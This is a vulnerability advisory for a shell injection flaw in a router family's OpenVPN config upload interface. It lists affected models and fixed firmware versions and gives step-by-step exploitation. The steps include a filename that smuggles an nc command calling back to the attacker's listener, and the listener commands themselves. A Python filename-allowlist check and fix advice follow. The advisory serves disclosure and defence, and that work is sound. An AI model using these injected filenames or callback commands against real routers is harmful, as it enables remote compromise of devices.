Ovpn interface shell injection

Description

This vulnerability can be exploited to manipulate routers by passing malicious shell commands through the Ovpn API.

Affected Product

● MT6000/A1300/X300B/AX1800/AXT1800/MT2500/MT3000/X3000/XE3000/XE300/E750/X750/SFT1200/AR300M/AR300M16/AR750/AR750S/B1300/MT1300/MT300N-V2/AP1300/B2200/MV1000/MV1000W/USB150/SF1200/N300/S1300

Affected Firmware Version

● MT6000: 4.5.8, fixed in 4.6.2
● A1300/X300B: 4.5.16, fixed in 4.5.17
● AX1800/AXT1800/MT2500/MT3000: 4.5.16, fixed in 4.6.2
● X3000/XE3000: 4.4.8, fixed in 4.4.9
● XE300: 4.3.16, fixed in 4.3.17
● E750: 4.3.12, fixed in 4.3.17
● X750/SFT1200/AR300M/AR300M16/AR750/AR750S/B1300/MT1300/MT300N-V2: 4.3.11, fixed in 4.3.17
● AP1300: 3.217, fixed in 3.218
● B2200/MV1000/MV1000W/USB150/SF1200/N300/S1300: 3.216, fixed in 3.218

Exploit

By invoking the interface of Ovpn, arbitrary shell commands can be executed to manipulate the router.

  1. Create a configuration file with a shell command in the filename: touch '$(nc 192.168.8.178 4444).txt'
  2. Use the previously created configuration file to create, for example, a tar archive: tar -cvf rce.tar '$(nc 192.168.8.178 4444).txt'
  3. Start an nc listener on the attacker's machine: nc -lvp 4444
  4. Use the upload function of the web application with the ovpn configuration to upload the tar archive file to the web application
  5. Then, a connection will be seen returning to the attacker's machine
  6. Start an nc listener on the attacker's machine: nc -lvp 4444
  7. (After authentication) Initiate a request with a malicious payload from the "params" parameter in the interface as part of the filename; additionally, append a valid administrative token as a parameter within "params".
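
The steps above work because a file name taken from an uploaded archive ends up inside a shell command line, where `$(...)` is expanded. As an added example (not code from this advisory or from the vendor's firmware), the following upload check rejects archive members whose names fall outside a strict allowlist; the allowlist pattern, the extension set and all function names are assumptions chosen for illustration.

```python
from __future__ import annotations
import io
import re
import tarfile

# Assumption: an OpenVPN config bundle only needs plain names such as
# "client.ovpn" or "ca.crt"; pattern and extension set are illustrative.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")
ALLOWED_EXT = {".ovpn", ".conf", ".crt", ".key", ".pem", ".txt"}


def check_member(member: tarfile.TarInfo) -> str | None:
    """Return a rejection reason for one archive member, or None if acceptable."""
    name = member.name
    if not member.isfile():
        return "not a regular file"
    if "/" in name or "\\" in name:
        return "path separators not allowed"
    if not SAFE_NAME.fullmatch(name):
        return "characters outside allowlist"
    dot = name.rfind(".")
    if dot < 0 or name[dot:].lower() not in ALLOWED_EXT:
        return "extension not allowed"
    return None


def audit_archive(data: bytes) -> dict[str, str]:
    """Map every rejected member name to its reason; an empty dict means clean."""
    rejected = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:  # names are inspected only, nothing is extracted
            reason = check_member(member)
            if reason:
                rejected[member.name] = reason
    return rejected


def build_sample(names: list[str]) -> bytes:
    """Constructed test input: an in-memory tar holding empty files."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for n in names:
            tar.addfile(tarfile.TarInfo(n), io.BytesIO(b""))
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample(["client.ovpn", "$(nc 192.168.8.178 4444).txt"])
    print(audit_archive(sample))
```

Name validation is a second layer; the primary fix is for the handler to pass file names as separate arguments to the program it runs instead of interpolating them into a shell string.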

Impact

Attackers can send malicious instructions through this vulnerability to manipulate routers.